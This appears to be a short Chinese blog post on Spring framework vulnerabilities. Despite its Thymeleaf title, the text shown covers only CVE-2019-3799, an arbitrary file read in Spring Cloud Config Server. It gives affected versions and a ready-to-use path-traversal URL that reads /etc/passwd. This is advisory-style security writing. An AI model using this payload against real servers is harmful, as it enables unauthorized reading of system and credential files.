spring框架漏洞整理(Spingboot Thymeleaf模板注入)
本文重点讲解Spingboot Thymeleaf模板注入漏洞。
Spring Cloud漏洞
(CVE-2019-3799)Spring Cloud Config Server 任意文件读取
漏洞影响
- Spring Cloud Config 2.1.0 to 2.1.1
- Spring Cloud Config 2.0.0 to 2.0.3
- Spring Cloud Config 1.4.0 to 1.4.5
- 其他不受支持的老版本 (如Spring Cloud Config1.3及其以下版本)
漏洞复现
配置文件如下
{name}/{profile}/{label}:name对应仓库名,profile对应配置文件,label为git分支名
poc不需要知道{name}/{profile}随便填写即可,但是{label}必须是存在的,master分支一般情况下都会有,所以poc可为
/1/1/master/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
川长思鸟来
港控/mmm°
Myth丶恋晨
╰+哭是因爲堅強的太久メ
深藏阁楼爱情的钟
Bertha 。
还没有评论,来说两句吧...